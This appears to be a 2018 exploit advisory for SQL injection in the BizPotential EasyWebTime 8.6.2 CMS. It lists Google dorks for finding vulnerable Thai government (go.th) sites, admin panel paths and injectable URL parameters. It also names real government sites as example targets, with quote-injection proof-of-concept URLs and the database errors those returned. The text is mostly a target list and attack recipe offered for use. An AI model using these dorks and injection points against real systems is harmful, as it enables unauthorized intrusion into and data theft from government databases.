#################################################################################################
# Exploit Title : BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/09/2018
# Vendor Homepage : bizpotential.com ~ ewtadmin.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dorks :
inurl:''/ewtadmin/'' site:go.th
inurl:''/main.php?filename='' site:go.th
inurl:''/ewtadmin/ewt/ccs/''
intext:''© Copyright 2007 - BizPotential.com - All Rights Reserved.''
intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved''
#################################################################################################
# Admin Control Panel Paths =>
/ewtadmin/index.php
/ewtadmin82/
/ewtcommittee/index2331.php
/ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php
# SQL Injection Exploit :
/n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection]
/ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection]
/more_news.php?offset=[SQL Injection]
/more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection]
#################################################################################################
# Webboard Exploit :
/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard
# Webboar Directory Path :
/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard
ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard
#################################################################################################
# Example Site =>
Thailand Government Chachoengsao Cooperative Auditing Office
cad.go.th/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1\%27&filename=webboard
cad.go.th/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard
ccs.cad.go.th/index_question.php?wcad=5&t=1&filename=webboard
#################################################################################################
Thailand Government Department of Mineral Sources
# Example Sites =>
dmr.go.th/n_more3.php?page=0&c_id=199%27 => [ Proof of Concept ] =>
dmr.go.th/ewtadmin/ewt/dmr_web/n_more.php?c_id=556%27 => [ Proof of Concept ] => archive.is/bUcka
# SQL Database Error =>
SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y' ORDER BY n_date DESC LIMIT -20,20
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,20' at line 1
Thailand Government Office of Consumer Protection Board
# ocpb.go.th/more_news.php?offset=-30&cid=&startoffset=-10%27 => [ Proof of Concept ] => archive.is/inA3o
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 10' at line 3
Thailand Government Ministry of Culture and Cooperatives - Auditing Department
# cad.go.th/cadweb_eng/ewt_w3c/more_news.php?offset=60%27 => [ Proof of Concept ] => archive.is/a4XYx
# SQL Database Error =>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\WWW\ewtadmin\ewt\cadweb_eng\lib\function.php on line 101
SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve = 'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end)
or (n_date_start = '' and n_date_end = '')) ORDER BY n_date DESC,n_timestamp DESC LIMIT 60\\\',20
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\',20' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################